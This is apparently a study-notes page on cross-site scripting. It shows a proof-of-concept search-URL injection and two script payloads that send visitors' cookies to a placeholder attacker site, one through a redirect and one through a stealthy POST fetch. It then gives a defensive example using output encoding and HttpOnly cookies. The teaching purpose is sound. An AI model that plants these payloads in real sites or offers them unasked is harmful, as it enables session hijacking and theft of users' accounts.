minte9
LearnRemember



XSS

You can confirm most XSS vulnerabilities by injecting some arbitrary JavaScript.
 
# Vulnerability proof

https://lab.academy.net/?search=<script>print()</script>

Cookies

Stealing cookies is a traditional way to exploit XSS.
 
# Comment form not filtering output:
# A hacker can send a malicious comment that will be viewed by everyone

<script> 
    document.location = 
        "https://www.hacker-site.com/?cookies="+ document.cookie; 
</script>
A more subtle approach that goes undetected uses POST and logs.
 
<script>
    fetch('https://www.hacker-site.com', {
        method: 'POST',
        mode: 'no-cors',
        body: document.cookie
    });
</script>
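
The defensive counterpart to the two payloads above, as an added example that is not part of the original page: encode comment text on output so the markup is displayed instead of executed, and mark the session cookie HttpOnly so it never appears in document.cookie. The function names, cookie names and sample values are assumptions made for this example, and scriptVisibleCookies is only a small model of the browser rule, not a browser API.

```javascript
// Added example: helper names and sample values are hypothetical.

// Characters that must be encoded when untrusted text is placed in HTML.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;'
};

// Encode untrusted text for an HTML element-content or quoted-attribute context.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Render one stored comment; every user-controlled field is encoded on output.
function renderComment(author, body) {
  return `<li class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</li>`;
}

// Build the Set-Cookie value for a session cookie.
// HttpOnly: not readable through document.cookie.
// Secure: sent over HTTPS only. SameSite=Lax: limits cross-site sending.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Model of what document.cookie would expose to page scripts:
// cookies set with the HttpOnly attribute are left out.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((header) => !/;\s*httponly\b/i.test(header))
    .map((header) => header.split(';')[0])
    .join('; ');
}

// Constructed sample input: the comment payload shown on this page.
const SAMPLE_COMMENT =
  '<script>document.location = ' +
  '"https://www.hacker-site.com/?cookies="+ document.cookie;</script>';

// Constructed sample cookies: one hardened session cookie, one plain preference.
const SAMPLE_COOKIES = [
  sessionCookieHeader('sid', 'abc123'),
  'theme=dark; Path=/'
];

console.log(renderComment('mallory', SAMPLE_COMMENT));
console.log(scriptVisibleCookies(SAMPLE_COOKIES));
```

Output encoding stops the injection itself, while HttpOnly limits what a script can read if an injection is missed elsewhere.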



  Last update: 513 days ago